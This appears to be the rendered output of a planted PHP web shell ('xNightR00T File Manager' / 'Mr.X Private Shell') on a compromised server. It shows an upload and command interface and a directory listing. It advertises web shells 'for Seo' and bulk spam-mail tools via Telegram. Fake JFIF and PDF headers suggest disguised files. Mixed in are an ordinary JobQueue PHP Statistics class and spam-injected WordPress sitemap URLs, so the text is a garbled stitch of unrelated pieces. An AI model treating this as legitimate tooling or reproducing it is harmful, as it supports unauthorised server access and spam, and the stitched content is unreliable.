xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace JobQueue\Model;

class Statistics
{
    /**
     * @var integer
     */
    private $waiting;

    /**
     * @var integer
     */
    private $waitingPredecessor;

    /**
     * @var integer
     */
    private $inProgress;

    /**
     * @var integer
     */
    private $completed;

    /**
     * @var integer
     */
    private $failed;

    /**
     * @var integer
     */
    private $logicallyFailed;

    /**
     * @var integer
     */
    private $scheduled;

    /**
     * @var integer
     */
    private $avgWait;

    /**
     * @var integer
     */
    private $avgRun;

    /**
     * @var integer
     */
    private $added;

    /**
     * @var integer
     */
    private $served;

    /**
     * @var integer
     */
    private $startupTime;

    /**
     * @param array $statistics
     * @return Statistics
     */
    public static function fromArray(array $statistics)
    {
        $self = new self();
        $self->setWaiting($statistics['waiting']);
        $self->setWaitingPredecessor($statistics['waiting_predecessor']);
        $self->setInProgress($statistics['in_progress']);
        $self->setCompleted($statistics['completed']);
        $self->setFailed($statistics['failed']);
        $self->setLogicallyFailed($statistics['logically_failed']);
        $self->setScheduled($statistics['scheduled']);
        $self->setAvgWait($statistics['avg_wait']);
        $self->setAvgRun($statistics['avg_run']);
        $self->setAdded($statistics['added']);
        $self->setServed($statistics['served']);
        $self->setStartupTime($statistics['startup_time']);
        return $self;
    }

    /**
     * @return number $waiting
     */
    public function getWaiting()
    {
        return $this->waiting;
    }

    /**
     * @return number $waitingPredecessor
     */
    public function getWaitingPredecessor()
    {
        return $this->waitingPredecessor;
    }

    /**
     * @return number $inProgress
     */
    public function getInProgress()
    {
        return $this->inProgress;
    }

    /**
     * @return number $completed
     */
    public function getCompleted()
    {
        return $this->completed;
    }

    /**
     * @return number $failed
     */
    public function getFailed()
    {
        return $this->failed;
    }

    /**
     * @return number $logicallyFailed
     */
    public function getLogicallyFailed()
    {
        return $this->logicallyFailed;
    }

    /**
     * @return number $scheduled
     */
    public function getScheduled()
    {
        return $this->scheduled;
    }

    /**
     * @return number $avgWait
     */
    public function getAvgWait()
    {
        return $this->avgWait;
    }

    /**
     * @return number $avgRun
     */
    public function getAvgRun()
    {
        return $this->avgRun;
    }

    /**
     * @return number $added
     */
    public function getAdded()
    {
        return $this->added;
    }

    /**
     * @return number $served
     */
    public function getServed()
    {
        return $this->served;
    }

    /**
     * @return number $startupTime
     */
    public function getStartupTime()
    {
        return $this->startupTime;
    }

    /**
     * @param number $waiting
     * @return Statistics
     */
    public function setWaiting($waiting)
    {
        $this->waiting = $waiting;
        return $this;
    }

    /**
     * @param number $waitingPredecessor
     * @return Statistics
     */
    public function setWaitingPredecessor($waitingPredecessor)
    {
        $this->waitingPredecessor = $waitingPredecessor;
        return $this;
    }

    /**
     * @param number $inProgress
     * @return Statistics
     */
    public function setInProgress($inProgress)
    {
        $this->inProgress = $inProgress;
        return $this;
    }

    /**
     * @param number $completed
     * @return Statistics
     */
    public function setCompleted($completed)
    {
        $this->completed = $completed;
        return $this;
    }

    /**
     * @param number $failed
     * @return Statistics
     */
    public function setFailed($failed)
    {
        $this->failed = $failed;
        return $this;
    }

    /**
     * @param number $logicallyFailed
     * @return Statistics
     */
    public function setLogicallyFailed($logicallyFailed)
    {
        $this->logicallyFailed = $logicallyFailed;
        return $this;
    }

    /**
     * @param number $scheduled
     * @return Statistics
     */
    public function setScheduled($scheduled)
    {
        $this->scheduled = $scheduled;
        return $this;
    }

    /**
     * @param number $avgWait
     * @return Statistics
     */
    public function setAvgWait($avgWait)
    {
        $this->avgWait = $avgWait;
        return $this;
    }

    /**
     * @param number $avgRun
     * @return Statistics
     */
    public function setAvgRun($avgRun)
    {
        $this->avgRun = $avgRun;
        return $this;
    }

    /**
     * @param number $added
     * @return Statistics
     */
    public function setAdded($added)
    {
        $this->added = $added;
        return $this;
    }

    /**
     * @param number $served
     * @return Statistics
     */
    public function setServed($served)
    {
        $this->served = $served;
        return $this;
    }

    /**
     * @param number $startupTime
     * @return Statistics
     */
    public function setStartupTime($startupTime)
    {
        $this->startupTime = $startupTime;
        return $this;
    }
}

Filemanager

Name Type Size Permission Actions
JobsSet.php File 510 B 0644
Mapper.php File 13.24 KB 0644
QueueStats.php File 1.35 KB 0644
RecurringJob.php File 6.65 KB 0644
RecurringJobSchedule.php File 8.04 KB 0644
RulesSet.php File 512 B 0644
Statistics.php File 5.4 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml